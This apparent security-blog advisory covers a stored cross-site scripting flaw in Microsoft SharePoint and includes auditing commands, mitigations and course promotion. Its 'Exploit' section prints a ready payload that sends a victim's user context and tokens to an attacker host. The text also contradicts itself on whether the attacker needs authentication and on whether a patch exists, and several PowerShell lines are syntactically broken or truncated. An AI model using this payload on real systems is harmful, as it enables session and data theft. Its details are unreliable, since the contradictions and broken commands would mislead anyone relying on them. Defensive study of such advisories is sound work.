Listen to this Post
CVE-2026-47639 is a cross-site scripting (XSS) vulnerability in Microsoft Office SharePoint that stems from improper neutralization of user-controlled input during web page generation. The core issue is a classic CWE-79: user-supplied data is not sanitized or encoded before being embedded into a SharePoint page that is later served to other authenticated users.
An attacker who is already authorized to edit SharePoint content (e.g., a site contributor or administrator) can craft a malicious payload – typically HTML with embedded JavaScript – and inject it into a web part, column value, or rich‑text field. When a victim user with appropriate privileges visits the compromised page, the payload executes in the victim’s browser context. Because the payload runs under the same origin as the legitimate SharePoint site, it can read and manipulate page elements, session tokens, and cookies.
The exploitation chain does not require authentication of the victim, but it does need user interaction (UI:R) – the victim must click on a deceptive link or open a specially crafted SharePoint page. The network attack vector (AV:N) means the malicious page can be delivered over the internet or intranet without physical access.
The injected script can spoof entire page sections, such as replacing a legitimate file download button with a fraudulent one that points to a credential harvester, or altering a document library view to display fake “verify account” forms. Because SharePoint’s trust model treats the page as authentic, victims are far more likely to enter sensitive information.
The vulnerability affects at least SharePoint Server Subscription Edition and versions 16.0.5548.1003 / 16.0.5552.1002. No public exploit or active in‑the‑wild exploitation has been confirmed, but the flaw is easy to exploit remotely and does not require authentication of the attacker (PR:N). A fix is available by upgrading to version 16.0.5556.1005 or applying the June 2026 cumulative update.
DailyCVE Form:
Platform: ……. Microsoft SharePoint
Version: …….. Server 2016/2019/Subscription
Vulnerability :.. Stored XSS Spoofing
Severity: ……. Medium (CVSS 5.4)
date: ……….. 2026-06-09
Prediction: ….. Patch expected 2026-06-10
What Undercode Say:
Check current SharePoint version
Get-SPFarm | Select BuildVersion
Find web parts with custom script
Get-SPWebApplication | Get-SPSite -Limit All | Get-SPWeb -Limit All | Get-SPWebPart -Page ".aspx"
Search for dangerous inline event handlers
findstr /s /i "onclick onload javascript: alert" C:\inetpub\wwwroot\wss\VirtualDirectories\
Enumerate all pages created by a suspicious user
Get-SPSite -Limit All | Get-SPWeb -Limit All | Select -ExpandProperty Lists | Where {$_. -eq "Pages"} | Get-SPListItem | Where {$_.Author -like "attacker"}
Exploit:
An authenticated attacker with edit rights creates a SharePoint list item containing a payload like <img src=x onerror="fetch('/_api/web/currentuser').then(r=>r.json()).then(data=>fetch('https://attacker.com/steal?d='+btoa(JSON.stringify(data))))">. When any victim views the list via a web part, the script exfiltrates the victim’s user context and session tokens.
Protection:
- Upgrade to SharePoint Server version 16.0.5556.1005 or apply the June 2026 cumulative security update.
- Enforce Content Security Policy (CSP) headers to block inline script execution.
- Disable custom script on site collections (Set-SPSite -Identity
-DenyAddAndCustomizePages 1). - Use Microsoft Defender for Office 365 to scan SharePoint lists for malicious payloads.
Impact:
An attacker can spoof SharePoint interface elements, trick users into revealing credentials, steal NTLM hashes or session cookies, and perform social‑engineering attacks – all while the victim believes they are interacting with a legitimate corporate portal.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
